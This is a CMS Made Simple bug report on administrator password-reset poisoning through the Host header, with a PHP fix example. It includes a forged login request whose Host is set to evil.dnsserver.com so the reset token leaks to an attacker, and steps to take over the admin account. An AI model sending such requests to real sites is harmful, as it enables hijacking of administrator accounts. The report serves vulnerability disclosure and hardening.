CMS MADE SIMPLE FORGE

CMS Made Simple Core

 

[#11762] Administrator Password Reset Poisoning by host header attack

Created By: reklawetihwx (reklawetihwx)
Date Submitted: Sat Mar 03 05:58:34 -0500 2018

Assigned To:
Version: None
CMSMS Version: 2.2.7
Severity: Minor
Resolution: Fixed
State: Closed
Summary:
Administrator Password Reset Poisoning by host header attack
Detailed Description:
The forget password function only needs the user name to generate the reset
password link to the user's email. The following POST request is the normal
request.

POST /admin/login.php HTTP/1.1
Host: Host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/admin/login.php?forgotpw=1
Cookie: [removed]
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 57

forgottenusername=admin&forgotpwform=1&loginsubmit=Submit

This is a normal reset password link:

http://Host/admin/login.php?recoverme=b18c6cc54432d97a1a7f28c6103b5b58

But the reset password link's host comes from the forget password POST
request. It means that if we change the Host header of the request, the reset
password link's host will be changed.

So if the attacker knows the administrator's name and changes the Host
header of the request, when the admin clicks the link, the attacker will know
the recoverme token. For example:
1. The attacker changes the Host header of the request to his DNS server, which is
evil.dnsserver.com

POST /admin/login.php HTTP/1.1
Host: evil.dnsserver.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/admin/login.php?forgotpw=1
Cookie: [removed]
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 57

forgottenusername=admin&forgotpwform=1&loginsubmit=Submit

2. Then the admin will receive the password reset link as follows:

http://evil.dnsserver.com/admin/login.php?recoverme=b18c6cc54432d97a1a7f28c6103b5b58

3. When the admin clicks the reset password link, the attacker will receive the
request from the admin, and the attacker will get the value of recoverme. Then
the attacker can make up a true reset password link with the true host and can
change the admin's password.
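
Added example (not part of the original report and not CMSMS code): the link-building pattern the report describes next to a version that takes the host from configuration and rejects unknown Host headers. CANONICAL_BASE_URL, ALLOWED_HOSTS, cms.example.org and the function names are hypothetical; the two sample requests are constructed from the ones in the report.

```php
<?php
// Added example, not CMSMS code. CANONICAL_BASE_URL and ALLOWED_HOSTS are
// hypothetical settings the site operator fixes at install time.
const CANONICAL_BASE_URL = 'https://cms.example.org';
const ALLOWED_HOSTS = ['cms.example.org'];

// Pattern the report describes: the link host is whatever the client sent.
function reset_link_from_request(array $server, string $token): string
{
    return 'http://' . $server['HTTP_HOST']
        . '/admin/login.php?recoverme=' . rawurlencode($token);
}

// Hardened: the link host comes only from configuration.
function reset_link_from_config(string $token): string
{
    return rtrim(CANONICAL_BASE_URL, '/')
        . '/admin/login.php?recoverme=' . rawurlencode($token);
}

// Defence in depth: refuse requests whose Host header is not one we serve.
function host_is_allowed(array $server): bool
{
    $host = strtolower($server['HTTP_HOST'] ?? '');
    $host = preg_replace('/:\d+$/', '', $host); // drop an optional :port
    return in_array($host, ALLOWED_HOSTS, true);
}

// Constructed sample input mirroring the two requests in the report.
$token = 'b18c6cc54432d97a1a7f28c6103b5b58';
$requests = [
    'normal'   => ['HTTP_HOST' => 'cms.example.org'],
    'poisoned' => ['HTTP_HOST' => 'evil.dnsserver.com'],
];

foreach ($requests as $label => $server) {
    echo "[$label]\n";
    echo '  from request: ' . reset_link_from_request($server, $token) . "\n";
    if (!host_is_allowed($server)) {
        echo "  hardened:     rejected, Host not in allow-list (send no mail)\n";
        continue;
    }
    echo '  hardened:     ' . reset_link_from_config($token) . "\n";
}
```

The same allow-list can also be enforced in front of the application, for example with a default virtual host that answers unknown Host values without passing them to PHP.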


History

Comments
Date: 2018-03-14 03:08
Posted By: reklawetihwx (reklawetihwx)

Any news about this?

Updates

Updated: 2018-08-25 10:26
state: Open => Closed

Updated: 2018-07-14 18:32
resolution_id: 5 => 7

Updated: 2018-03-25 07:34
resolution_id: => 5
cmsms_version_id: 31359 => 31369